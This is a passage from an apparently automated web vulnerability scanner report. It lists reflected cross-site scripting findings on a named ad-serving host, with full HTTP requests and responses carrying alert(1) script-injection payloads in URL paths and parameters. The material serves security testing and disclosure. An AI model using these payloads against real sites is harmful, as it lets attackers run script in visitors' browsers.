Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&906d8"-alert(1)-"52b95d4418a=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.374. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1670623313@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1272e"><script>alert(1)</script>8fdf9178846 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM1272e"><script>alert(1)</script>8fdf9178846/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM1272e"><script>alert(1)</script>8fdf9178846/2010DM/1612541180/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.375. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1670623313@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed86"><script>alert(1)</script>f1a30b8d9f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMeed86"><script>alert(1)</script>f1a30b8d9f7/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMeed86"><script>alert(1)</script>f1a30b8d9f7/2065109648/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.376. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1670623313@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2e1"><script>alert(1)</script>1981e911952 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1670623313@x23de2e1"><script>alert(1)</script>1981e911952?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/134522517/x23de2e1"><script>alert(1)</script>1981e911952/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.377. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1670623313@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b0f4"-alert(1)-"1442e938870 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_7285b0f4"-alert(1)-"1442e938870 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_7285b0f4"-alert(1)-"1442e938870";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.378. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1670623313@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdfee"-alert(1)-"5a6dcd4bc89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&cdfee"-alert(1)-"5a6dcd4bc89=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&cdfee"-alert(1)-"5a6dcd4bc89=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.379. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ed0"><script>alert(1)</script>c14b682a958 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM85ed0"><script>alert(1)</script>c14b682a958/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM85ed0"><script>alert(1)</script>c14b682a958/2010DM/1275337580/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.380. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e164"><script>alert(1)</script>b13fbcb6a6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM2e164"><script>alert(1)</script>b13fbcb6a6b/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM2e164"><script>alert(1)</script>b13fbcb6a6b/808994133/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.381. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e9d9"><script>alert(1)</script>94f02ef6711 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1874556783@x234e9d9"><script>alert(1)</script>94f02ef6711?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/341633720/x234e9d9"><script>alert(1)</script>94f02ef6711/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.382. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_TF_CT_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e06"-alert(1)-"347645d577c was submitted in the USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_72848e06"-alert(1)-"347645d577c HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2481
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_72848e06"-alert(1)-"347645d577c";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.383. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40e2a"-alert(1)-"b1fcf879478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728&40e2a"-alert(1)-"b1fcf879478=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2484
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_728&40e2a"-alert(1)-"b1fcf879478=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.384. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1902448725@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a931d"><script>alert(1)</script>2e0f0c892ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa931d"><script>alert(1)</script>2e0f0c892ca/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
